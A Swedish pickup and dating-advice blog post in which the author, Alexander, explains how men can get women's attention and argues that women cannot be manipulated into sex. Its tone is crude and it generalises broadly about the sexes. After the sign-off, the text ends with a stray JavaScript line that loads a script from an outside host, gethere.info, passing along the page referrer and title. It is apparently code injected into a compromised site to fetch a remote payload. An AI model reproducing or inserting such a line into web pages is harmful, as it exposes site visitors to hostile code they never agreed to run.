finish Attraktion

Hon är blond, lång och har en utstrålning som fångar din blick. Eller så är hon brunett och exotisk. Hennes byst sticker ut och hennes kurvor får dig att trigga till.

– Du är attraherad.

Många män har olika smaker och tankar på vad de finner otroligt attraktivt i en kvinnas utseende. Viktigt att notera är att oftast är det mest vad man föredrar, inte vad man ENBART tycker om. Det viktigaste dock är: Alla män attraheras, i otroligt stora drag, till likadana attribut. Eller så tillhör man en minoritet (eller en annan sexualitet)

Här kommer en sanning som många människor har svårt att ta till sig och acceptera: Det samma gäller alla kvinnor.

Vad de attraheras av tänker jag inte slösa denna posten till då vi skrivit om det i många drag. Vad denna posten handlar om är hur man ”raggar” på tjejer.

Så hur raggar man som kille? Ett faktum är att kvinnor attraheras långt mycket mer än män till personliga karaktärsdrag. Vilket innebär att du behöver inte vara Brad Pitt för att få Angelina Jolie. Hon har, faktiskt efter allt varit GIFT med Billy Bob Thornton (och om du inte vet vem han är, eller tycker att du är för ful för att få vackra kvinnor i ditt liv – googla honom)

Den dåliga nyheten är: då vi ofta kan attraheras av en kvinna utan att hon behöver göra något mer än att vara inom vårt synhåll, gäller tyvärr inte alltid det för oss män. Så vad vi måste lära oss är två saker:

1) Bli attraktiva

2) Få kvinnors uppmärksamhet så att de kan upptäcka våra attraktiva karaktärsdrag.

Låter jag fånig? Well… It is. Tänk hur fånigt det skulle vara om jag i detalj bröt ner hur man gör ett ”längre” toalettbesök? I bet that would make you laugh! Att paras är en biologisk funktion och det finns ingen cool logik bakom.

En annan punkt är att du kan inte MANIPULERA en kvinna till att vilja knulla dig. Sorry dude, but you just CAN’T! Det är en av anledningarna till varför jag tycker det är fånigt när vi får kritik som säger att vi lurar kvinnor i säng, för den personen som ger den kritiken säger underförstått att kvinnor är dumma och naiva och jag håller inte med! Hell fucking no! Hade kvinnor vart ”lättlurade” så skulle jag inte haft ett jobb! De skulle gå på alla ”får jag köpa dig en drink” fällor!

Så, igen, hur gör vi?

Genom att gå fram och visa vårt intresse direkt, utan att famla/se ner på marken så visar vi DIREKT och väldigt KRAFTFULLT attraktiva kvaliteter. Och att vi senare släpper den höga pressen på att gå fram och visa intresse genom att börja prata om annat och få in ett par skämt så visar vi upp andra attraktiva egenskaper. Vi exploderar ut och demonstrerar TUSEN olika karaktärsdrag som kommer få henne att förstå att vi är attraktiva.

Om vi nu inte vill göra någon obekväm, säg att hon är med en enda kompis, så kan vi istället gå in lite mer indirekt för att få båda involverade och succesivt visa mer intresse till den vi finner attraktiv.

Bottomline is, vi kan inte ”göra något mot tjejerna”. Vi kan bara fånga deras uppmärksamhet så att de själva kan få upp ögonen för oss. När de väl GÖR DET så kommer de, med all genuin vilja, att vilja ha oss. Och det är då vi hamnar i en ”fas” där vi båda är intresserade av varandra. Hon fick vårt intresse väldigt snabbt då vi helt enkelt attraheras långt mycket mer till utseende så vi tog initiativet till att ”visa upp” oss (vilket är en väldigt dålig inställning, men det förklarar ”pardansen”) och hon tyckte om det hon såg så nu är vi på gemensam grund.

Vad som händer här är oftast ”socialt programmerad” grej att man ska ”lära känna varandra”. Vilket är en viktig punkt men vem har sagt att man inte kan ha sex först? Här kommer självklart ett val för henne och ett för dig:

Ditt val är: Vill jag gå långsamt för att detta är en kvinna jag vill bygga upp sexuell spänning med så att det långsamt nästan dödar mig, eller är spänningen redan så hög att jag inte kan låta bli?

Hennes val är: Är jag bekväm nog att ha sex med honom? (många killar tror att man måste göra en tjej kåt nog för att ha sex med honom, vilket är helt fel. Killar missuppfattar ofta att tjejer har ”svårt” för att bli kåta när problemet egentligen är att kvinnan inte är bekväm nog för att tillåta sig själv att bli kåt. När en tjej väl är bekväm med att ha sex med dig så kommer hon att vilja bli kåt)

Allt som händer under denna ”fas” bidrar till att skapa dynamiken som ert förhållande kommer att ha.

Så denna ”fas”, för att kalla det för något, är helt enkelt ett ställe där ni beslutar om vad ni vill göra med varandra och många män har helt fel uppfattning om vad som gäller. Om du är en av dessa, eller bara är nyfiken över vad som egentligen är det som boken ”spelet” skulle kalla för ”Comfort” så häng med min bloggpost som kommer på Lördag som bara kommer att handla om just detta.

Vi ses då.

– Alexander

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;